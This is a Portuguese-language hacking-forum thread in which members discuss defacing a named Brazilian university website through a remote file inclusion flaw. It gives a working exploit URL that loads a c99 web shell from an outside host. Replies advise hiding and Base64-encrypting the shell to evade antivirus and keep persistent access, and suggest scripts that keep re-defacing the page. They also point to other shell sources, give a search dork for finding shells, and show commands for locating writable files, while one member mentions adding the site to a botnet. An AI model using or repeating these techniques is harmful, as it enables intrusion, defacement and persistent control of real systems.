FORUM DARKERS

Primero, queria agradecer ao HadeS q me ajudo nisso..
Agora.. Eu descobri q o site da puc minas está vulneravel a um simples PHP Injection e é bem por aki http://www2.pucminas.br/seminariori/ind ... 2F&sort=0a (http://www2.pucminas.br/seminariori/index.php?arquivo=http%3A%2F%2Fdefacedx.pochta.ru%2Fc99shell.txt%3F&act=ls&d=%2Fhtdocs%2Fpucminas%2F&sort=0a)
vc consegue fazer um deface.. Olha

Tah assim

Perms
?-----------

Quando o ?----- tah verde significa que esse arquivo vc pode alterar.
Nem precisa ser PHP. Eu consegui fazer alguns defaces na área de Administracao. MAS : Eles fazem tudo voltar ao normal em uns 5 minutos. Mas não corrigem.. Então eh soh vc dexar o site aberto . Qndo vc ver q eles corrigiram, vai lah e clica Save de novo.., Comigo deu certo.. Soh q eu parei de por ^^ Bom tah ai, quem quiser testar seus conhecimentos de php injection ^^
Como eu achei a falha:

Goooooooooooogle! ^^ Usando uma boa string, fui tentando um por um.. Isso prova  q ainda tem sim sites vulneráveis.. soh ter boa vontade e você faz um deface! nem que seja de cinco minutos ^^

VLW! Falow!

po nao faça isso rs tem mto script kiddie por ai que vai ficar atrapalhando o probre coitado do webmaster =p

mas se quer fazer o deface mesmo, upa um script que fica trocando a pagina e coloca uma cmd num diretorio escondido...nosso amigo magrinho costuma fazer isso 

parabens ae hehe bem rox...mas existem softs pra caçar esses vuls pra vc ^^ depois da uma procurada ai..

até mais

Eu não recomendo deixar uma Web Shell no servidor não, ainda mais sendo c99.

Qualquer anti-vírus detecta isso, se quer mesmo deixar uma Web Shell no servidor, recomendo usar uma criptografia no arquivo, para assegurar-se que nenhum anti-vírus vai achar, mas de qualquer modo, qualquer administrador atento pode achar a página lá, até porque se ele descobrir alguma página desse tipo, provavelmente perderá o aceso.

HadeS

Amigo, não pretendia entrar nesse topico e achar mais um site para minha botnet. Obrigado

Um conselho, criptografe o c99 e upe em um diretorio escondido. Assim o webmaster não podera retirar teu acesso. =]

cara nem tinha pensado em fazer isso ^^ sou lammer mesmo mas fiz um deface pelo menos.. vou tentar upar a c99
fala ai como criptografa! vlw!

para criptografar
http://rgirardin.mine.nu (http://rgirardin.mine.nu)

seria bom a moderaçao tirar o link

rog

Magrinho, só por curiosidade...

Como está fazendo sua botnet?

HadeS

tipo.. eu não to conseguindo upar arquivo algum..
se alguém quiser ajudar.. eu fiz um deface de modo que vc entra aki http://www2.pucminas.br/dw/ (http://www2.pucminas.br/dw/) e jah tah dentro do sistema.. logo logo vão tirar..

lol

Se não tá conseguindo upar arquivos, como fez pra colocar a Web Shell? Alterou algum arquivo existente né?

E é estranho conseguir escrever e não conseguir upar. E uma coisa, criptografou a Web Shell?

Aliás, conseguiu por no Zone-H?

HadeS

Hehe lembrei de um termo usado no livro "Fortaleza Digital" Tubarões se referindo aos hackers que estavam atacando o sistema da NSA lol

Zero cool, não entendi. ???

HadeS

aew galera, valew, mas vo parar de incomodar eles.. só queria comentar q ainda funciona a falha.. mas tem q ter persistencia lammer e ir tentando um por um  lol flw

Quote from: "HadeS"Zero cool, não entendi. ???

HadeS

um site vulneravel exposto na rede /Underground..
um peixe sangrando em águas profundas..

geralmente servidores sao unix
e sites tem mtooo arquivo e o webmaster quase nunca sai verificando todos, porque ?
porque eles tem muito serviço e nao ficam gravando tudo
alias tem mais modos de se fazer uma cmd ficar totalmente oculta, assim como tem outras tecnicas rodando por ai no meio da galera do dharma, porém nao convem ensinar isso aqui

t+

Quoteporém nao convem ensinar isso aqui

vindo de um membre do darkers team fica meio confuso e esquizito

rog

tem coisas que sao priv rog, não é porque eu sou do darkers team que vo falar oque um grupo de amigos independentes do forum descobriu.

creio que eu faço por merecer fazer parte do darkers team mesmo sem ensinar algumas coisas, alias foi por isso que o genesis me deu acesso, e se eu e meus amigos descobrimos coisas novas, porque a galera nao pode descobrir tambem ? eh questao de pensar apenas...tem muita gente que soh fica querendo coisa mastigada e por isso nao desenvolvem suas proprias habilidades...quando comecei morria de raiva desses grupos e de pessoas como eu, mas soh agora vejo que é necessario ser assim.

t+

Pra começar, só porque o sistema é Unix não se roda anti-vírus?!? 

E se importam-se com o site, deveria sim ter alguém que verificasse constantemente os arquivos.

Realmente, existem métodos de se deixar uma Web Shell um pouco menos reconhecível, como o que disse, usando criptografia, Base64, e pra isso podem usar o serviço online do rog, no link que ele passou.


E só mais uma coisa branco, se sabe de uma coisa e não pretende ensinar, seria melhor ninguém saber que você sabe. Eu, por exemplo, não tenho o menor interesse em saber sua técnica, mas pode ser que alguém tenha ficado com água na boca, e atoa, já que não vai ensinar, então não precisa fazer isso. Sem contar que não pode recomendar a uma pessoa que ela use uma técnica "priv" e "exclusiva".

HadeS

lol pelo visto ta faltando um pouco de conhecimento na sua area unix em ^^

citei as tecnicas priv só pra dar uma ideia de ocultamento que ninguem sabe, pra ve se usam a cabeça um pouquinho 

eu tambem nao tenho interesse nenhum em ficar usando elas, mas gosto porque envolvem segurança.

vo parar de discutir pra evitar confusao e pra nao ter que falar doque se trata a tecnica.

esqueçam oque eu disse ^.~

segunda "guerra" que "perco" porque nao posso contar as coisas lol, mas ta valendo

t+

Calma senhores, vamos parar de fazer flames war aqui. O topico é do garoto, ele fez um bão, ou melhor otimo trabalho achando essa vulnerabilidade e ainda veio aqui compartilhar conosco, e vocês ficam discutindo. lol Vamos prestigiar o muleke, ele é uma pessoa legal compartilhando oq descobriu conosco.

@Branco: Sei que você não pode falar sobre esse lance, mas tente ao menos "ensinar como se pesca" para o pessoal poder ter uma ideia do que você está falando.

@Hades: Fique calma meu amigo, não há motivo para se exaltar. Quanto à botnet, estou fazendo de um jeito bem simples. Quando estiver tudo finalizado posto o code totalmente comentado para a galera do DK e com licença GNU.

eu não consigo upar arquivo nenhum
e se eu editar uma página e colocar a cmd, o adm vai perceber na hora, não? alguem ajuda ai, já tão fugindo do sentido do tópico.

Fiote, me add no msn, podemos trocar umas infos. =]
thefungo@hotmail.com

Quote from: "Zero cool"

Quote from: "HadeS"Zero cool, não entendi. ???

HadeS

um site vulneravel exposto na rede /Underground..
um peixe sangrando em águas profundas..

Valeu, entendi.


p3005, tenta usar alguma outra Web Shell, ou roda algum comando pra puxar o arquivo.

Magrinho, eu perguntei mais porque eu to(tava) fazendo uma em PHP. Cheesy

E branco, pra começar, não existe nenhuma "guerra" aqui não.

E existem sim AVs para sistemas Unix.



HadeS

veja se é o safe mode que ta on ou se você não tem permissao de escrita, existe um meio de burlar o safe mode..

tambem tente verificar outras partições, geralmente as cmds não mostram todas

só pra lembrar :
r = leitura
w = escrita
x = executar

caso sua cmd não disponha de letras,
r = 4
w = 2
x = 1
ai você soma pra ver qual permissao tem acesso, exemplo
4 + 0 + 0 = 4, só pode ler

e a hierarquia das permissoes ficam assim :

dono - grupo - usuarios

por exemplo, se a permissao é 777

significa que as permissoes pra dono sao rwx (  4+2+1 ) pro grupo e usuarios a mesma coisa.

vale lembrar que o usuario do servidor é o www-data e ele se encaixa em usuarios, a nao ser que o administrador mudou as permissoes.

pra procurar algo no servidor, algum arquivo com permissao pra tudo escrita leitura e execução por exemplo

use : ls -l -R /diretorio | grep rwx

obs : esses comandos sao pra linux

e tambem leia esses topicos :
http://www.darkers.com.br/forum/index.php?topic=5727.0 (http://www.darkers.com.br/forum/index.php?topic=5727.0)

T_T o outro foi deletado acho, do php & mysql = root
-.-....genesis devia pegar os tuturiais e por em uma area separada pra nao perder nunca

falow...

t+

valew cara, não sou muito expert nessa área, então esses comandos que vc falou podem ser feitos pelo php Konsole? (usando cmd: http://phpshell.mackatack.com/source.txt (http://phpshell.mackatack.com/source.txt)? )
valew, vo ler o tópico.

essa ai nao conheço, mas podem ser feitos na c99

Não, pelo que ele me disse o Safe Mode está OFF.

E acho que ele tem algum diretório com escrita, como ele mesmo disse:

Quote from: "p3005"Quando o ?----- tah verde significa que esse arquivo vc pode alterar.

Seria só achar o tal "?-----"  verde em um diretório.

HadeS

entao é essa cmd que ele ta usando que ta ruim, oque bloqueia upload é o safe mode e permissao de escrita...

tenta com essa http://nershess.orgfree.com/darkers.txt (http://nershess.orgfree.com/darkers.txt)

o ruim é que a shell dela nao retorna os resultados, na epoca nao me lembrei de fazer essa função, ou se fiz nem me lembro, mas acho que nao retorna nao...
testa ai

e mais uma coisa que é pouco provavel mas pode acontecer, é ele ter desabilitado funções de upload...
use a cmd do darkers e veja quais funções estão desabilitadas..

mais uma coisa, o mysql ta on ? veja na cmd tambem.

t+

alguém fala o link de uma c99 ativa? e como faz pela c99? valew 

faz assim no google ó :

allinurl : c99.txt

 

Foi o que havia dito, pra tentar com outra Web Shell.

HadeS